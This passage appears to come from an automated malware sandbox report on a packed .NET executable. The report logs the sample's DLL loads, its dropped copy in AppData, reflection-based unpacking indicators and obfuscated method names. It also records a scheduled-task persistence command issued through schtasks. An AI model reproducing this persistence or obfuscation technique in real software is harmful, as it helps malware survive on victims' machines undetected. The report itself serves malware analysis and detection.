                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: msvbvm60.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: vb6zz.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: sxs.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: scrrun.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: winsqlite3.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: vbscript.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: mpr.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: zipfldr.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: dui70.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: duser.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: oleacc.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: atlthunk.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: explorerframe.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: msxml3.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: mlang.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: esscli.dll
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeAutomated click: Continue
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: oS6KsQIqJxe038Y.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: oS6KsQIqJxe038Y.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: oS6KsQIqJxe038Y.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: #]??Y-)\S.PdB source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: W.pdb4 source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Isyl.pdb source: oS6KsQIqJxe038Y.exe, XgbXowhljC.exe.0.dr
                    Source: Binary string: Isyl.pdbSHA256 source: oS6KsQIqJxe038Y.exe, XgbXowhljC.exe.0.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 0.2.oS6KsQIqJxe038Y.exe.5600000.5.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    .NET source code contains potential unpacker
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, u2hrBWS7a8s3GxO9MO.cs.Net Code: xr33CSJ2UXBl2g2sUnA System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0133FAA0 pushad ; retf 0_2_0133FCD2
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0133E180 push esp; retf 0_2_0133E182
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0133DD51 push edx; retf 0_2_0133DD52
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_01339C50 push ds; retf 0_2_01339C52
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0133DCE8 push edx; retf 0_2_0133DCFA
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_01339CC1 push ds; retf 0_2_01339CC2
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0B617198 pushfd ; retf 0_2_0B6171A1
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0BF92E20 push 0004C2FFh; retn 0004h0_2_0BF92E3B
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0BF993C7 push edx; retf 0_2_0BF993C8
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0BF9934A push ebx; retf 0_2_0BF9934C
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0BF9924D push esp; retf 0_2_0BF99254
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeCode function: 11_2_057FD8E0 pushfd ; ret 11_2_057FD919
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeCode function: 11_2_057FD8D2 push eax; ret 11_2_057FD8D9
                    Source: oS6KsQIqJxe038Y.exeStatic PE information: section name: .text entropy: 7.80203646179826
                    Source: XgbXowhljC.exe.0.drStatic PE information: section name: .text entropy: 7.80203646179826
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, XaIbU4XQeABqHABV1u.csHigh entropy of concatenated method names: 'EU4m89ZjMG', 'VDFmjVvjuK', 'prum7JaNWY', 'lfKmfK7GEt', 'Ibbmq8mBIS', 'YnYmDP9KJr', 'nbTme2sFy1', 'vIMmZuI5PY', 'jf0mGYt9R9', 'aDwmvrQIui'
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, TwXHa9V8Ly15UI1mB0.csHigh entropy of concatenated method names: 'NQdYPkec18', 'xw3YH7hsnP', 'kJrY0JR7eY', 'EDBYkcdTk9', 'TnuYKh26ZN', 'Dh5YS3PEu4', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, JXsLFbPNfJFB3VJ65y.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'g1ECcdjqRv', 'x8WCVCOuDV', 'XI2CzEbFsQ', 'g766QLUZZI', 'uxX6WEcEVt', 'Jf26CodoK0', 'RFp66RUS19', 'XRx7qdJaZCkCvuq42nw'
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, va8FitWwr56HDCAbxEh.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't0tuKg6Z2X', 'fv9uYE2qcd', 'qcvuFmEfLD', 'LOduu66dVs', 'MoFuhCFRvm', 'vtZubWMPrd', 'omRuxbmMYN'
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, rlCi7mgGFMLRmM2M5o.csHigh entropy of concatenated method names: 'ToString', 'oP49vhN2ut', 'zvZ9f3FSlw', 'w8q9oxjnCQ', 'LN59qDJ2S2', 'TwM9DaA4tC', 'WYj9RXiWmP', 'FJP9eeSHn7', 'YAO9ZS3Npm', 'Itt95UNCJq'
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, g8nY9SOuGTe06vRvrf.csHigh entropy of concatenated method names: 'Dispose', 'GnxWcsyTSA', 'SctCfbeGXA', 'MH3CehaTlL', 'YhTWVbC7k9', 'CUGWzAWXlu', 'ProcessDialogKey', 'lNVCQ3k4nR', 'jHNCWcefOh', 'xSkCCAwXHa'
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, n0OUWU4HViDVDWyqr6.csHigh entropy of concatenated method names: 'MNXHBAPukd', 'H1xH2jbblC', 'JnGPoZIFsY', 'BB7PqrCR8B', 'E2oPD9aEHB', 'MDgPRp2CwI', 'MuvPeoglTF', 'r6GPZ3ExXZ', 'cFcP5LSa5N', 'eyLPGZ5jdT'
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, zNHHL35wkNSnr3mphj.csHigh entropy of concatenated method names: 'X7mkU9QLd6', 'bCkkNfleVK', 'zgYka4L9ob', 'g5Jkp68MFb', 'YYUkBdvd44', 'POIktvJAVF', 'HYok2M1HAU', 'EEyk8ONFAI', 'KiMkj3B3pN', 'uuFk40e7lN'
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, vaPwDR8wrxM670fQud.csHigh entropy of concatenated method names: 'IlTOEhHW7Q', 'FckOT08RwT', 'GarOg80SQN', 'kY1OAYHFq9', 'x63Oigoa8E', 'GwPOMUekCe', 'qirO1cw2En', 'I69Oy6c6ZE', 'TXBOc6P9ZI', 'wCbOVCBuHY'
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, hw1QDE74anbUXkgda0.csHigh entropy of concatenated method names: 'fD30rEtJMm', 'QBQ0Ohbsg7', 'qrp0Hsi3hu', 'ceq0k3VoyI', 'H9Q0SjwxG2', 'u0qHiIe9qO', 'sPjHMu49vR', 'oceH1H7gBn', 'JCBHyobu7F', 'aeaHc0X3P2'
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, BGDpK6zs5d19WsQ06R.csHigh entropy of concatenated method names: 'a1aYtbbylK', 'j7BY8ZEODT', 'IujYjL34K2', 'oGFY79FStL', 'jc8YfTZXgq', 'QASYqJsMIo', 'oqGYDjJnVD', 'WHfYxYUsAk', 'A4HYU7r0tW', 'nLQYNh9NZo'
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, dYeU62wC91xTQ2nIwn.csHigh entropy of concatenated method names: 'NihWkaPwDR', 'drxWSM670f', 'SZsWsvMImO', 'QOeWJpJ0OU', 'byqWnr6Pw1', 'aDEW94anbU', 'lXGmJCG5cBxQ6DS1sw', 'UdcooYnLFHZTimu6u9', 'CV8WWGmBQ8', 'gGQW6hDyD6'
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, JbU3fiWWeUAPi6hffsx.csHigh entropy of concatenated method names: 'mhpYVkYajj', 'iSKYzaPHvO', 'WcYFQEFqCa', 'vKrFWwQnwD', 'elHFCvPxye', 'irIF6lL08a', 'lMkFw3g3XI', 'KlVFr9rk8E', 'vvsF3OPHEZ', 'L0YFOTOEM5'
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, hbK87BAx24PKIkgDSO.csHigh entropy of concatenated method names: 'dnYlsWLT8e', 'WpJlJvp6X2', 'ToString', 'W6ll3MAXuw', 'pXrlO6ERqU', 'v2LlPFrD8H', 'lb4lHD1Zem', 'xNCl02KNHd', 'yMAlk1rDhN', 'H2ElSau68W'
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, u2hrBWS7a8s3GxO9MO.csHigh entropy of concatenated method names: 'Qxu6rm5nvJ', 'oQw63QpoOP', 'JqB6O7NBJX', 'jlx6PpItF6', 'mmM6H7ou1p', 'Rj960kjOiQ', 'NMe6kffkRW', 'vIZ6SPmb2r', 'r066Ick1tB', 'd806sxjOBl'
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, UGRy6lWQ9qxgNjVR1f9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hH4Yv2H8cE', 'rOlYLv87wI', 'HNxYXbrDdN', 'OroYEusguZ', 'bBuYT1M0Dd', 'tMeYgsZfL0', 'BTYYA3Ej4g'
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, Y3k4nRckHNcefOhUSk.csHigh entropy of concatenated method names: 'n96K7DhOb0', 'zJVKfl5jDf', 'TIlKoR12fw', 'dP4KqyZglJ', 'RnYKDDyUZ7', 'rMMKRgnZJL', 'ShuKeDLrYW', 'GSqKZPeCsL', 'H9fK56MPxM', 'GGFKGnYC7Z'
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, UOgDt6EhgdUHtEfqyr.csHigh entropy of concatenated method names: 'b00nGm9aYw', 'DUWnLwOysO', 'EGwnEAXHfV', 'JiqnT3POoo', 'pZVnfwFVks', 'BAQnoMCjWs', 'M67nqvkg5W', 'Y2BnDbyrCv', 'RMdnRmS1NH', 'dALneM2uN8'
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, Kgy1jgM7KEF1JYSQLD.csHigh entropy of concatenated method names: 'un4lyHLpMK', 'leVlVodEcH', 'A5TdQEyHcI', 'BxodWBVhfN', 'SLnlvdrjLD', 'QMolLtR3Bf', 'U4WlX92EQ7', 'Kp9lEgN5EU', 'P3klTjdjWq', 'rpwlgd5f0o'
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, nd2NWE15N7nxsyTSAV.csHigh entropy of concatenated method names: 'GOFKnAbxbm', 'mFJKl9hRSG', 'oVcKKlwIBc', 'OfXKFJLAjW', 'O8uKhrlCYF', 'YrHKxY6YU8', 'Dispose', 'MEPd3qNHIy', 'LVJdOI5OAT', 'bjTdPPUkDr'
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, t4UdYCCh6xYjDPxYgQ.csHigh entropy of concatenated method names: 'ixPannmEy', 'Kmcp8i1PY', 'HpEtq9wEU', 'OXK2ys6aA', 'xA4j3B1xO', 'WwG4PK15Q', 'arnW6I2DEdflXxW6EM', 'pEKSgNFDvQKBJ0B1ne', 'eOUdRGJ8t', 'zsUYyGCp2'
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, NNvEggjZsvMImOEOep.csHigh entropy of concatenated method names: 'wrQPpEfZDZ', 'Y63Ptpd3Xo', 'O7UP8H3h4i', 'T0RPjJCrVt', 'KyUPndvL6y', 'um1P9BmbiU', 'ts6PlbKaLB', 'HbIPd8hrJP', 'PmwPK2wNPA', 'Rg5PYxjqJ0'
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile created: C:\Users\user\AppData\Roaming\XgbXowhljC.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
